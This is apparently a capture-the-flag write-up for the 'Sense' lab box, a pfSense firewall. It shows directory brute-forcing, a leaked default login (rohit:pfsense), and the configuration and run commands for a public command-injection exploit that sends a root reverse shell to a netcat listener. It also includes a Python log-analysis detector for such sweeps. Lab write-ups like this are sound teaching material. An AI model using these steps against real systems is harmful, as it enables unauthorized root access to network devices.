Summary

Sense is an easy box running pfSense, a FreeBSD-based firewall (not Linux). It can be exploited by brute-forcing directories and files on the web interface, which reveals the pfSense login page and, more importantly, a text file that leaks a username and hints at the password. Those credentials, combined with a public exploit for a vulnerability that was left unpatched, give a root shell directly.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.94.74

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Gobuster found the following locations:

https://10.129.94.74:443/system.php
https://10.129.94.74:443/changelog.txt (Status: 200)
https://10.129.94.74:443/system-users.txt (Status: 200)
https://10.129.94.74:443/xmlrpc.php (Status: 200) [Size: 384]

The page https://10.129.94.74/changelog.txt contains the following note:

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

This strongly suggests that one known vulnerability is still unpatched. The page https://10.129.94.74/system-users.txt contains a support ticket that names an active user:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

"Company defaults" points at the vendor default. After a couple of tries, the working combination turned out to be the lowercased username with the stock pfSense password:

rohit:pfsense

With these credentials the user is authenticated to the pfSense dashboard.
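The two things this discovery phase leaves behind in the firewall's web server log are a wordlist sweep (many distinct paths returning 404 from one client in a few seconds) and successful reads of plain-text files that should never be served unauthenticated. The following detection logic is an added example, not code from this writeup or from pfSense. The log lines are constructed in Apache/lighttpd combined-log format; the client IPs, timestamps, the SENSITIVE_FILES list and the thresholds are assumptions.

```python
"""Spot a directory brute-force and sensitive-file reads in a web access log.

Added example (not from the original writeup). The sample log below is
constructed; IPs, timestamps, file list and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/lighttpd combined log format, fields we care about only.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Files that should never be reachable without authentication on a firewall GUI
# (assumed list, based on what the sweep in this writeup turned up).
SENSITIVE_FILES = {"/system-users.txt", "/changelog.txt"}

# Constructed sample: a legitimate admin session from 10.129.94.10 and a
# gobuster-style sweep from 10.10.14.24 that hits the two text files.
SAMPLE_LOG = """\
10.129.94.10 - - [17/Mar/2024:09:58:40 +0000] "GET /index.php HTTP/1.1" 200 4512
10.129.94.10 - - [17/Mar/2024:09:58:55 +0000] "POST /index.php HTTP/1.1" 302 0
10.10.14.24 - - [17/Mar/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 345
10.10.14.24 - - [17/Mar/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 345
10.10.14.24 - - [17/Mar/2024:10:00:02 +0000] "GET /config HTTP/1.1" 404 345
10.10.14.24 - - [17/Mar/2024:10:00:02 +0000] "GET /system.php HTTP/1.1" 302 0
10.10.14.24 - - [17/Mar/2024:10:00:03 +0000] "GET /changelog.txt HTTP/1.1" 200 271
10.10.14.24 - - [17/Mar/2024:10:00:03 +0000] "GET /test.txt HTTP/1.1" 404 345
10.10.14.24 - - [17/Mar/2024:10:00:04 +0000] "GET /users.txt HTTP/1.1" 404 345
10.10.14.24 - - [17/Mar/2024:10:00:04 +0000] "GET /system-users.txt HTTP/1.1" 200 106
10.10.14.24 - - [17/Mar/2024:10:00:05 +0000] "GET /xmlrpc.php HTTP/1.1" 200 384
10.10.14.24 - - [17/Mar/2024:10:00:05 +0000] "GET /old HTTP/1.1" 404 345
10.129.94.10 - - [17/Mar/2024:10:02:10 +0000] "GET /status_rrd_graph.php HTTP/1.1" 404 345
"""


def parse_line(line):
    """Return a dict for one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def parse_log(text):
    """Parse every well-formed line; silently skip anything that does not match."""
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def find_bruteforce(records, window=timedelta(seconds=30), min_distinct_404=5):
    """Map client IP -> largest number of distinct 404 paths seen inside any
    `window`-long span. Only clients reaching `min_distinct_404` are returned.
    Counting distinct paths matters: a browser retrying one broken link is not
    a wordlist sweep, but six different missing paths in four seconds is."""
    misses = defaultdict(list)
    for r in records:
        if r["status"] == 404:
            misses[r["ip"]].append((r["ts"], r["path"]))
    flagged = {}
    for ip, hits in misses.items():
        hits.sort()
        lo = 0
        for hi in range(len(hits)):
            # Slide the window start forward until it spans at most `window`.
            while hits[hi][0] - hits[lo][0] > window:
                lo += 1
            distinct = {p for _, p in hits[lo:hi + 1]}
            if len(distinct) >= min_distinct_404:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged


def find_sensitive_reads(records):
    """Successful (200) reads of files from SENSITIVE_FILES, as (ip, path)."""
    return sorted({(r["ip"], r["path"]) for r in records
                   if r["status"] == 200 and r["path"] in SENSITIVE_FILES})


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("brute-force clients:", find_bruteforce(recs))
    print("sensitive reads:", find_sensitive_reads(recs))
```

On the constructed sample the sweep from 10.10.14.24 is flagged with six distinct missing paths, and both text-file reads are reported; the legitimate client with a single 404 is not. The sensitive-file check is the more valuable of the two on a real firewall: a 200 for a file like system-users.txt is a finding regardless of how many 404s preceded it.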


Exploitation

Searchsploit was used to look for known pfSense vulnerabilities, since changelog.txt indicated that one remained unpatched:

jeroen@kali:~$ searchsploit pfsense injection
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection                                              | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                | php/webapps/43560.py
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The exploit used was https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py, which targets the status_rrd_graph_img.php command injection listed above. The variables at the top of the script were modified as follows:

username = "rohit"                      # pfSense GUI credentials found above
password = "pfsense"
listener_ip = "10.10.14.24"             # attacker host that catches the reverse shell
listener_port = "4444"
target_ip = "10.129.94.74"
url = "https://{}/".format(target_ip)
proxied_url = "https://127.0.0.1:31337/"  # optional local proxy (e.g. Burp) for inspecting requests

With a netcat listener waiting on port 4444 (nc -lvnp 4444), the script was run with:

python pfsense_exec.py nc

This provided a root shell straight away: the pfSense web GUI runs as root, so command injection in it needs no separate privilege escalation step. From there both user.txt and root.txt can be read.


Conclusion

This was a very easy box: thorough brute-forcing of files as well as directories (the .txt hits are what mattered) handed over the credentials, and the pfSense exploit was straightforward, so rooting it did not take long. Hope you had the same experience and enjoyed this writeup!